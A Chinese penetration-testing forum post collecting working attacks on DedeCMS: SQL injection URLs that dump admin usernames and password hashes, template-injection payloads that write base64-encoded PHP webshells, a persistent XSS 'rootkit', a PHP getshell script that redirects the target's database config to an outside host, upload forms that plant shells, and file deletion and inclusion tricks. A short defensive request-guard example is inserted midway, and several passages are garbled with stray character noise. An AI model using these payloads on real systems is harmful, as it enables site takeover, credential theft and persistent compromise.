China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: dedecms vulnerability summary

Author: admin    Time: 2012-10-18 10:42

Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account, upload software: in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry triggers execution.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, directly creating a one-line shell.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

% Z" g% k+ T( c. O! t7 D+ z! Q1 Y
9 y. u. B  F5 C7 @1 O. e  n" |" f1 f+ M

0 s4 g# P5 u& N7 D7 c1 f% ?9 `  X
6 y. f. E0 l3 d3 D8 w  i2 i( u
. E0 a4 _& ^/ D3 V4 ]; q6 cDEDECMS 全版本 gotopage变量XSS漏洞: a9 c( q6 j8 Y) n8 W# V
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 . F$ w2 H+ L8 R' f: E4 \* s0 C+ m
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; afterwards, no matter how you visit any of the URLs below, our XSS is triggered.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the HTTP status line; "OK" past offset 12 means "HTTP/1.1 200 OK".
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n";
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n";
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
return "";
}
fwrite($ock,$data);
// Read and return only the first line of the response (the status line).
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

The precondition for this vulnerability is that the backend path must already be known.

Dedecms 织梦 tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the record: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member panel, publish an article, upload an image, then in attachment management replace the image with our carefully crafted template; for example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
: y- U) i3 U) E9 {- D<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">3 f5 u3 \' D) i; Z  G2 C- Q
<input type="hidden" name="dopost" value="save" />. O. i1 |! [% i
<input type="hidden" name="aid" value="2" />6 i' u9 s, p" z
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />  N; i- \; e& n4 y' e) x# K( q
<input type="hidden" name="channelid" value="1" />
9 f  [9 b/ @* W8 P" b/ g4 }<input type="hidden" name="oldlitpic" value="" />
8 R" s0 o8 G. G1 v% O2 p. X<input type="hidden" name="sortrank" value="1275972263" />+ S( P# w2 e6 n: _4 K3 T

4 z0 Y1 h+ H1 X% A* Q% Z4 _0 f) o0 B: k" B/ Z: U" x% M
<div id="mainCp">
7 y5 M: i3 R+ {# O' V- }<h3 class="meTitle"><strong>修改文章</strong></h3>
; m; g) }( ]+ D7 n4 d) Y1 V" q9 }: E& E

2 V1 G0 T! ^: B0 L4 _<div class="postForm">4 Y2 }1 n/ ^# E
<label>标题:</label>
& A1 Q# d% Z. d& S! `) j& s<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>, b9 H* J3 H; i9 E# r

+ K0 d  D* f% _' V/ X4 T5 {# X) Z) Q( R/ {
<label>标签TAG:</label>
7 m' Q8 Z& ]1 w, T( N' |( \<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)' ~: \/ I4 D4 Z( q  m

# ?6 h$ u/ ]' S
5 _* Z+ S- ?0 f# z4 B  p<label>作者:</label>
. `6 O0 `2 @- N# J3 P<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
& B  `6 R$ E4 R
  K' k. `! O  b( }; v4 K8 M  t) |# C% D8 {0 ^! s
<label>隶属栏目:</label>
6 b, `! v! d) N6 ^/ e. F<select name='typeid' size='1'>1 f" j6 D8 w4 f( ?4 x
<option value='1' class='option3' selected=''>测试栏目</option>$ w4 t- }. q, [. q4 U8 t3 g
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类): O5 O: U: s% W" H% f

$ w: v% ]  W4 K4 a
6 P4 H0 H; W' l, U<label>我的分类:</label>$ w+ {  ^. F% R
<select name='mtypesid' size='1'>
1 z6 }+ J: m2 {! {) |' ^( D% b( `<option value='0' selected>请选择分类...</option>& v% v0 J3 Z" F- b; ~$ ^
<option value='1' class='option3' selected>hahahha</option>
4 A& B. h; F# c+ f" p9 F</select>' j* P3 J$ i  f& ~/ |: P
$ y' O  x; a/ E! |1 |4 @1 j

& O) }4 q3 p: u, }2 e+ J<label>信息摘要:</label>  A2 Q) u  p  e0 x5 Z
<textarea name="description" id="description">1111111</textarea>
+ X- ~+ `8 l( J0 i1 x9 n% y(内容的简要说明), v0 z; t$ q. a

* L) T  G5 c- H' f; D& e' Z7 K- m7 V! j. \
<label>缩略图:</label>
! Y% s8 M  t' L1 e<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>, `3 |$ i5 c. o

: `/ N/ A4 l& F2 a5 m1 l. L* Z" n" v
<input type='text' name='templet'
- _0 T) I1 t7 Tvalue="../ uploads/userup/2/12OMX04-15A.jpg">
6 e8 I8 _8 ~4 ^9 e<input type='text' name='dede_addonfields'
( B& l" V+ J% V2 ?1 X8 gvalue="templet,htmltext;">(这里构造)5 o, Z0 S: p3 J. x
</div>) d+ h6 k0 ~) s" u" S, R% W

. v( B$ _9 U7 s3 Y. `
* _9 h( t$ Z2 g2 S0 m/ K6 x& l<!-- 表单操作区域 -->
: c. a0 L; |9 @, L7 f5 r% u5 K<h3 class="meTitle">详细内容</h3>3 ], d' a; i- Q7 k$ F% i
5 i! [6 Z0 m& ?5 A2 d$ g
# b( Z  K0 d$ E( c
<div class="contentShow postForm">" S* ?) K2 @0 a3 R, ?, \
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>6 M! g1 G% |9 z% G1 J
: U0 l! n6 Q% z% p- I0 l% t6 r

- k4 h. ]: C% ?+ C: \' t* ^7 X<label>验证码:</label>
7 W; f6 H2 q1 t7 D$ w<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
$ ?# g5 ]# U6 O. j$ l0 n: g( R9 a<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
# q  J* @, ~' f) w) M0 ?# ~$ x& T4 f2 U; ~7 ~
: `% c5 m! m2 n/ I+ n
<button class="button2" type="submit">提交</button>& W, o; i/ ?+ S
<button class="button2 ml10" type="reset">重置</button>8 W6 Y4 [: c  o6 u! k
</div>6 A0 W4 M. |) e4 B
; W# j* n' M$ P" N9 ]/ C- @

6 T% a, ^$ u4 E</div>. @! [! e( H5 d$ T0 L

3 ^' M1 ^8 Q4 k/ f$ R
& E# C3 v* n. j</form>2 t* z, I6 a6 J4 ^: ^8 ^1 _' _6 m
2 |" w: o0 E, C' f- d
4 D4 d) G% u) W! f  T
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
3 ~! j6 @" |$ o假设刚刚修改的文章的aid为2,则我们只需要访问:3 l! F2 ~2 h4 t
http://127.0.0.1/dede/plus/view.php?aid=2- n. N) J/ f7 d4 Q
即可以在plus目录下生成webshell:1.php9 g; \+ S' I. Q- W; y

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">更改</button>
</form>

Build the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
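Added defensive example, not code from the original post or from DedeCMS itself: a PHP request guard that rejects, before any application code runs, the three input shapes that the variable-overwrite getshell, the {dede:php}/runphp template sections and the edit_face.php file-deletion URL above all depend on. Function names and the sample requests are constructed for illustration.

```php
<?php
// Added example, not from the original post or from DedeCMS: a request guard that
// rejects the input patterns the payloads above rely on. Names and samples are constructed.
// 1. Variable overwrite: request keys reaching GLOBALS / cfg_* through a superglobal,
//    e.g. the POST field _COOKIE[GLOBALS][cfg_dbhost], which PHP parses into
//    $_POST['_COOKIE']['GLOBALS']['cfg_dbhost'].
function findOverwriteKeys(array $params, string $where): array
{
    $hits = [];
    foreach ($params as $key => $value) {
        $k = (string) $key;
        if ($k === 'GLOBALS' || substr($k, 0, 1) === '_' || stripos($k, 'cfg_') === 0) {
            $hits[] = $where . ': forbidden key ' . $k;
        }
        if (is_array($value)) {
            $hits = array_merge($hits, findOverwriteKeys($value, $where . '[' . $k . ']'));
        }
    }
    return $hits;
}

// 2. Template tags that run PHP when the stored text is rendered:
//    {dede:php}...{/dede:php} and any {dede:xxx ... runphp='yes'}.
function findTemplateTags(string $text): array
{
    $hits = [];
    if (preg_match('/\{dede:php\b/i', $text)) {
        $hits[] = 'content: {dede:php} tag';
    }
    if (preg_match('/\{dede:\w+[^}]*\brunphp\s*=\s*[\'"]?yes/i', $text)) {
        $hits[] = "content: runphp='yes' tag";
    }
    return $hits;
}

// 3. Directory traversal in parameters that name a file (oldface, templet, code, ...).
function findTraversal(array $params, array $pathKeys): array
{
    $hits = [];
    foreach ($pathKeys as $key) {
        $v = $params[$key] ?? null;
        if (is_string($v) && preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $v)) {
            $hits[] = $key . ': traversal in ' . $v;
        }
    }
    return $hits;
}

// Run all checks; a non-empty result means the request should be rejected before dispatch.
function guardRequest(array $get, array $post, array $cookie): array
{
    $findings = array_merge(
        findOverwriteKeys($get, '_GET'),
        findOverwriteKeys($post, '_POST'),
        findOverwriteKeys($cookie, '_COOKIE'),
        findTraversal($get + $post, ['oldface', 'templet', 'code', 'activepath'])
    );
    foreach ($post as $value) {
        if (is_string($value)) {
            $findings = array_merge($findings, findTemplateTags($value));
        }
    }
    return $findings;
}

// Constructed sample requests shaped like the payloads above (not captured traffic).
$samples = [
    'variable overwrite' => [[], ['_COOKIE' => ['GLOBALS' => ['cfg_dbhost' => '1.2.3.4']]], []],
    'runphp tag'         => [[], ['body' => "{dede:field name='x' runphp='yes'}phpinfo();{/dede:field}"], []],
    'file delete'        => [['dopost' => 'delold', 'oldface' => '/uploads/userup/8/../../../m_logo.gif'], [], []],
    'legitimate edit'    => [['aid' => '2'], ['title' => 'hello', 'body' => 'plain text'], ['PHPSESSID' => 'abc']],
];
foreach ($samples as $name => [$get, $post, $cookie]) {
    $findings = guardRequest($get, $post, $cookie);
    printf("%-18s %s\n", $name, $findings ? 'BLOCK: ' . implode('; ', $findings) : 'allow');
}
```

The first three samples are reported as BLOCK with the offending key, tag or path named; the last is allowed.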

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 password; from that, drop 3 characters from the front and 1 from the end to get the 16-character MD5.

3 }% d3 [* _# t: I& R
; {8 c. z# ^9 y+ b% f8 o& s9 m
+ j% A5 O: A# U6 |6 v$ a9 V5 V- s6 |
7 [: i$ J. ~& T; f; |  e
+ b1 G1 ], l% S
2 K6 h; j8 U4 s0 w; k
  l) k- g1 Q. X
% Q$ C# K$ r4 |! W; @- c$ t5 A; P  Z" L# d( U4 D8 W% C2 M
: Y7 v9 t6 `% P9 D
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞# B5 d( ~: _# R  S
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t ---------- <br /><br />
<form action='http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php' method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
Exploits an error raised by a numeric overflow in a MySQL field, combined with DEDECMS writing database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the information from step 2 means the file trojan was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2